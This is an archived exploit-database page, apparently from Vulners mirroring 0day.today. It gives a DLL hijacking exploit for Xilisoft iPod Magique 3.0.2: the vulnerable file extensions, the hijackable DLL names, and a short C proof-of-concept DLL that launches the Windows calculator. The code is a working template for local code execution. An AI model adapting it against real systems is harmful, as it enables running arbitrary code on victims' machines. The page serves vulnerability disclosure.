Lucene search
K

Xilisoft iPod Magique 3.0.2 <= DLL Hijacking Exploit

🗓️ 01 May 2011 00:00:00Reported by Caddy-DzType 
zdt
 zdt
🔗 0day.today👁 14 Views

Xilisoft iPod Magique 3.0.2 DLL Hijacking Exploi

Code
################################################################
# Exploit Title: Xilisoft iPod Magique 3.0.2 <= DLL Hijacking Exploit
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: [email protected]
# Category: Local Exploit
# Tested on: Windows Xp Sp 2
################################################################
[*]

|>> Special Greets To : KedAns-Dz & All Algerians Hackers

[*] Vulnerable extensions:

3gp,3g2,asf,avi,dv,dif,vob,flv,m2ts,mts,m4v,swf,mkv,dvr-ms,cda,mjpeg,mod,mpg,mpeg,mpa,dat,ts,mpv,nut,nsv,mov,qt,h261,h264,rm,rmvb,wmv,asf,xwmv,yuv

[*] Vulnerable Dlls:

quserex.dll ; wintab32.dll

--------------------------------

#include <windows.h>
#define DllExport __declspec (dllexport)
 
DllExport void hook_startup() { exp(); }
 
int exp()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}



#  0day.today [2018-04-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation